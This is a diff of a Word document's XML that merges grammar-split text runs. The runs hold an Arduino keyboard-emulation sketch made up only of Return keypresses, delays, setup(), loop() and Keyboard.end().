-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26507,25 +26152,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26559,25 +26186,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26620,25 +26229,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Keyboard.end(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>);</w:t>
+                              <w:t xml:space="preserve">  Keyboard.end();</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26698,25 +26289,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">void </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>loop(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>) {}</w:t>
+                              <w:t>void loop() {}</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -26769,25 +26342,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">void </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>int key) {</w:t>
+                        <w:t>void typeKey(int key) {</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -26821,18 +26376,8 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
+                        <w:t xml:space="preserve">  delay(</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -26908,25 +26453,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">void </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>setup(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>) {</w:t>
+                        <w:t>void setup() {</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27003,18 +26530,8 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
+                        <w:t xml:space="preserve">  delay(</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -27115,25 +26632,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27167,25 +26666,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27202,25 +26683,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27254,25 +26717,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27289,25 +26734,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27324,25 +26751,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27376,25 +26785,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27411,25 +26802,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27463,25 +26836,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27498,25 +26853,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27550,25 +26887,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27585,25 +26904,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27637,25 +26938,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27672,25 +26955,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27724,25 +26989,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27759,25 +27006,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27811,25 +27040,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27846,18 +27057,8 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
+                        <w:t xml:space="preserve">  delay(</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -27907,25 +27108,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27942,25 +27125,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27994,25 +27159,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28029,25 +27176,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28081,25 +27210,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28116,25 +27227,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28168,25 +27261,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
